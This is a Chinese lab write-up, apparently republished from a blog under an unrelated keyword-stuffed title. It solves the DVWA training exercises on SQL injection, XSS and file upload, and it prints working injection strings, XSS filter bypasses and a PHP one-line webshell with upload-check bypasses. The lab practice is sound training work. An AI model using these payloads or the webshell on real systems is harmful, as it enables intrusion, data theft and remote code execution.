您的位置:首页 > 财经 > 产业 > 网站制作教程:初学者_宝安区在深圳排第几_泰安网站制作推广_关键词密度

网站制作教程:初学者_宝安区在深圳排第几_泰安网站制作推广_关键词密度

2024/10/30 15:10:51 来源:https://blog.csdn.net/qq_42780280/article/details/143214130  浏览:    关键词:网站制作教程:初学者_宝安区在深圳排第几_泰安网站制作推广_关键词密度
网站制作教程:初学者_宝安区在深圳排第几_泰安网站制作推广_关键词密度

Docker搭建DVWA靶场以及刷题记录

  • Docker搭建DVWA靶场以及刷题记录
    • 靶场搭建
  • 刷题记录
    • SQL Injection
      • Low
      • Medium
      • High
      • Impossible
    • SQL Injection(Blind)
      • Low
      • Medium
      • High
    • XSS (Reflected)
      • Low
      • Medium
      • High
    • XSS (Stored)
      • Low
      • Medium
      • High
    • File Upload
      • Low
      • Medium
      • High

Docker搭建DVWA靶场以及刷题记录

靶场搭建

  1. 获取资源
docker pull sagikazarmark/dvwa
  1. 启动
docker run  -p 8087:80 --name dvwa sagikazarmark/dvwa
  1. 初始化

在这里插入图片描述
在这里插入图片描述

刷题记录

SQL Injection

Low

在这里插入图片描述
输入

1'//有报错

在这里插入图片描述
可以观察到,入参是被双引号包围的
构造1"#绕过
在这里插入图片描述

两个回显位,之后注入语句参考
在这里插入图片描述

Medium

在这里插入图片描述

id提供了可选值,不能直接输入,BurpSuite抓包修改看是否有效

id=3'&Submit=Submit//回显报错信息

在这里插入图片描述
输入的'被转义了,直接输注入语句

id=3 union select 1,1&Submit=Submit

在这里插入图片描述

High

在这里插入图片描述
在这里插入图片描述
点击提交会回显
在这里插入图片描述

输入特殊语句1',直接回显失败页面,可能是布尔盲注
在这里插入图片描述
还有空回显的页面
在这里插入图片描述

不能盲注,看WriteUp发现是源码设置了limit 1,从而只能检索一行数据

2' union select database(),12 limit 1,1 #

在这里插入图片描述

Impossible

在这里插入图片描述
上边的测试方法都没回显了,试试时间盲注

?id=1' and sleep(5)
?id=1" and sleep(5)
?id=1' and sleep(5) #
?id=1" and sleep(5) #

也没有明显的时间差异

SQL Injection(Blind)

Low

在这里插入图片描述
可以看到查询成功回显User ID exists in the database.,否则回显User ID is MISSING from the database.

1 //User ID exists in the database.
1' //User ID is MISSING from the database.
1'# //User ID exists in the database.

之后就是查数据了,参考Less-5

1'  and left(database(),1)='d' #
......

Medium

在这里插入图片描述
抓包修改id值即可

id=5 and length(database()) = 4&Submit=Submit

在这里插入图片描述

High

在这里插入图片描述
同样也是查询成功回显User ID exists in the database.,否则回显User ID is MISSING from the database.

1 //User ID exists in the database.
1' //User ID is MISSING from the database.
1'# //User ID exists in the database.

查询数据即可

1' and length(database()) = 4#

XSS (Reflected)

Low

在这里插入图片描述
输入注入语句,直接弹窗成功

<script>alert(1)</script>

Medium

同样输入,但是这次不行了,看下是被如何转义了

<script>alert(1)</script>

在这里插入图片描述
输入的<script>没了
在这里插入图片描述
闭合pre标签试试

</pre><script>alert(1)</script>

在这里插入图片描述

还是被转义了,这次大小写混合绕过了

</pre><Script>alert(1)</script>

High

输入注入语句,查看页面发现输入还是在pre标签内

<script>alert(1)</script>

在这里插入图片描述

尝试闭合

</pre><Script>alert(1)</script>

在这里插入图片描述
逐步测试

</pre>123

在这里插入图片描述

</pre><a href="javascript:alert('XSS');">Click me</a>
</pre><a href="#" onclick="alert('XSS')">Click me</a>//点击连接成功弹窗,感觉是屏蔽了`script`

源码如下,确实正则过滤了script
在这里插入图片描述

XSS (Stored)

Low

在这里插入图片描述
输入注入语句成功弹窗

<script>alert(1)</script>

在这里插入图片描述

Medium

<script>alert("Medium")</script>在这里插入图片描述
输入的<script>没了,大小写和双写混合都没绕过

<Script>alert(321)</script>

在这里插入图片描述

看下输入框处的代码,看了WP是对第一个输入框进行攻击
在这里插入图片描述
先修改第一个框的输入限制改为30,再输入攻击语句成功弹窗
在这里插入图片描述

High

存储型的练习没有提供删除功能,每次可以重置一下,点击Setup/Rese tDB
在这里插入图片描述
和反射型的一样对script进行了过滤,换一种攻击语句,同样也是针对第一个输入框进行注入

<a href="#" onclick="alert('XSS')">Click me</a>

File Upload

Low

在这里插入图片描述

直接上传一句话木马

<?php @eval($_POST['cmd']);?>

提示上传成功

../../hackable/uploads/1.php succesfully uploaded!
http://ip:8087/hackable/uploads/1.php //蚁剑成功连接

Medium

在这里插入图片描述

上传一句话木马被提示只允许 JPEG or PNG ,BP抓包确定是否为前端检查,若是则可以抓包修改后缀
在这里插入图片描述

抓包有记录,说明是传到了后端进行的检测,尝试其他绕过方法,修改

Content-Type: image/jpeg
->
Content-Type:application/octet-stream

上传成功了,说明是检查了MIME type
在这里插入图片描述

High

上传一句话木马,同样被提示只允许图片文件,上传图片马参考Less-16
在这里插入图片描述
但是图片没有被按照PHP执行,还需要一个文件包含漏洞的环境,
在这里插入图片描述
新开标签页将Security改为Low,来到靶场下的File Inclusion ,输入图片马地址被成功执行
在这里插入图片描述

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com